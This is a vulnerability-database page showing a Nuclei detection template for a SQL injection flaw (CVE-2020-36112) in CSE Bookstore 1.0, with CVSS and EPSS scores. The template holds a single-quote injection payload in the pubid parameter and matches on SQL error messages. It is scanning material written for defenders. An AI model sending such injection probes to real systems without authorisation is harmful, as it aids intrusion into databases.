Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-36112
HistoryMay 18, 2021 - 10:56 p.m.

CSE Bookstore 1.0 - SQL Injection

2021-05-1822:56:54
ProjectDiscovery
github.com
5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.405 Medium

EPSS

Percentile

97.3%

CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.

id: CVE-2020-36112

info:
  name: CSE Bookstore 1.0 - SQL Injection
  author: geeknik
  severity: critical
  description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49314
    - https://www.tenable.com/cve/CVE-2020-36112
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36112
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-36112
    cwe-id: CWE-89
    epss-score: 0.40486
    epss-percentile: 0.97275
    cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cse_bookstore_project
    product: cse_bookstore
  tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project

http:
  - raw:
      - |
        GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "get book price failed! You have an error in your SQL syntax"
          - "Can't retrieve data You have an error in your SQL syntax"
        condition: or
# digest: 490a0046304402203616fb072b4db2eab9fa478e6dc3f3035f1206cc86adce846dac33d3aca8ec86022007f79e0e1a6b2c0165aeae26da3dc9bd658a410613cfbae403f02293e8cb4c09:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.405 Medium

EPSS

Percentile

97.3%

Related for NUCLEI:CVE-2020-36112